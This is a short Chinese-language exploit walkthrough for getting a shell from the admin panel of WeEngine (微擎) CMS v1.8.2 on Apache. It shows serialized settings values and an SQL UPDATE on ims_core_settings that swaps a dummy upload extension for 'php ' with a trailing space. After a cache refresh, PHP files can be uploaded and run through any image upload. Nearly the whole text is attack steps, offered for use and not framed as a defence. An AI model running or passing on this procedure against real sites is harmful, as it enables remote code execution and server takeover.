微擎cms后台Getshell

Part.1 环境

漏洞环境
apache
php7.2
版本: v1.8.2（201812130002）

Part.2步骤

站点-附件设置-支持文件后缀
在安装完成的时候,数据库里面并没有写入上传类型的数据 需要自己添加允许上传的后缀 然后才会写入数据库

a:3:{s:16:"attachment_limit";  
i:0;s:5:"image";a:5:{s:5:"thumb";i:0;s:5:  
"width";i:800;s:10:"extentions";  
a:4:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;s:3:"png";}  
s:5:"limit";i:5000;s:14:"zip_percentage";s:3:"100";}  
s:5:"audio";a:2:{s:10:"extentions";a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}

Part.3 利用

写入任意的数字 字母

a:3:{s:16:"attachment_limit";i:0;s:5:"image";  
a:5:{s:5:"thumb";i:0;s:5:"width";i:800;s:10:"extentions";  
a:5:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;  
s:3:"png";i:4;s:3:"aaa";}s:5:"limit";i:5000;
s:14:"zip_percentage";s:3:"100";}s:5:"audio";  
a:2:{s:10:"extentions";  a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}

站点-常用工具-数据库-执行SQL语句替换之前插入的值 (记得打开调试模式)

替换aaa 为 php 空格 注意php后有一个空格

UPDATE ims_core_settings SET value = replace(value, 'aaa', 'php ')

a:3:{s:16:"attachment_limit";i:0;s:5:"image";  
a:5:{s:5:"thumb";i:0;s:5:"width";i:800;s:10:"extentions";  
a:5:{i:0;s:3:"gif";i:1;s:3:"jpg";i:2;s:4:"jpeg";i:3;  
s:3:"png";i:4;s:3:"php ";}s:5:"limit";i:5000;  
s:14:"zip_percentage";s:3:"100";}s:5:"audio";  
a:2:{s:10:"extentions";a:1:{i:0;s:3:"mp3";}s:5:"limit";i:5000;}}

系统-更新缓存

随便找个可以上传图片的地方就可以了

以上只仅限于apache下 nginx多一个空格php文件是不能执行的